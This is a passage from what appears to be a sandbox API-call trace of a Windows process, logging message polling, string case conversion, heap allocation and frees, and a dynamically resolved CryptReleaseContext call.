lpsz="SSA0000901A0E") returned 0xd [0106.040] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0106.040] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0106.040] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0106.040] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.040] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.040] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0106.040] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.040] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.041] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0106.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.041] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0106.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.041] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0106.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.041] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0106.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.041] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0106.041] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0106.041] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0106.041] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0106.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.042] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.042] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.042] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.042] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.042] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.042] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0106.042] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.042] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0106.042] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.656] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 1 [0106.656] TranslateMessage (lpMsg=0x8cf138) returned 0 [0106.656] DispatchMessageW (lpMsg=0x8cf138) returned 0x0 [0106.656] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0106.657] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0106.657] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0106.657] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.657] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0106.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0106.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0106.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0106.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0106.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0106.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0106.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0106.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.658] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0106.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0106.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0106.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0106.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0106.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0106.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0106.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0106.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0106.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0106.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0106.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0106.660] GetProcAddress (hModule=0x76390000, lpProcName="CryptReleaseContext") returned 0x763afbc0 [0106.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0106.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.660] CryptReleaseContext (hProv=0x9be890, dwFlags=0x0) returned 1 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0106.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0106.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0106.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0106.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0106.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0106.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0106.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0106.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0106.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0106.663] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0106.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0106.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0106.663] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0106.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0106.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0106.663] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0106.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0106.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0106.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0106.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0106.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0106.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0106.664] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0106.664] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0106.664] 